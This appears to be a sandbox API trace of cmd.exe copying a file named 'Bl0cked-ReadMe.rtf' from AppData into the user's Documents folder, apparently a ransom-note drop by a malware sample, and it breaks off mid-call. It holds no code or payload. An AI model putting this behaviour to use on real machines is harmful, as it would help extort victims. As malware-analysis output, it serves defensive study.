[0232.444] GetFileType (hFile=0x7) returned 0x2 [0232.692] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef5e8 | out: lpMode=0x1ef5e8) returned 1 [0232.692] _dup (_FileHandle=1) returned 3 [0232.693] _close (_FileHandle=1) returned 0 [0232.693] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0232.693] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef5b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0232.693] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0232.693] GetConsoleTitleW (in: lpConsoleTitle=0x1ef3e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.693] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0232.693] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0232.693] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0232.693] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0232.694] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.694] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1eef4c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eef4c) returned 0x250e50 [0232.695] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0232.695] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0232.695] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0232.695] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ede58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0232.695] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] GetFileType (hFile=0x54) returned 0x1 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1edeb0 | out: lpFileSizeHigh=0x1edeb0*=0x0) returned 0x1632 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.695] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.695] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.696] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] GetFileType (hFile=0x4c) returned 0x1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] GetFileType (hFile=0x4c) returned 0x1 [0232.696] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.696] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.697] GetFileType (hFile=0x4c) returned 0x1 [0232.697] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.698] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.698] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] GetFileType (hFile=0x4c) returned 0x1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.698] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.698] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.699] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.699] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.699] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.699] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] GetFileType (hFile=0x4c) returned 0x1 [0232.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.700] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.700] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.700] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.700] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] GetFileType (hFile=0x4c) returned 0x1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.701] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.702] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.702] GetFileType (hFile=0x4c) returned 0x1 [0232.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.703] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] GetFileType (hFile=0x4c) returned 0x1 [0232.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.703] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eedd8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee28*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eee78*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeec8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eeec8*, lpNumberOfBytesWritten=0x1edecc*=0x20, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edeb8 | out: lpNewFilePointer=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.704] ReadFile (in: hFile=0x54, lpBuffer=0x1eece8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1eded8, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesRead=0x1eded8*=0x200, lpOverlapped=0x0) returned 1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] GetFileType (hFile=0x4c) returned 0x1 [0232.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.704] WriteFile (in: hFile=0x4c, lpBuffer=0x1eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eece8*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed38*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: hFile=0x4c, lpBuffer=0x1eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edecc, lpOverlapped=0x0 | out: lpBuffer=0x1eed88*, lpNumberOfBytesWritten=0x1edecc*=0x50, lpOverlapped=0x0) returned 1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] GetFileType (hFile=0x4c) returned 0x1 [0232.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.705] WriteFile (in: 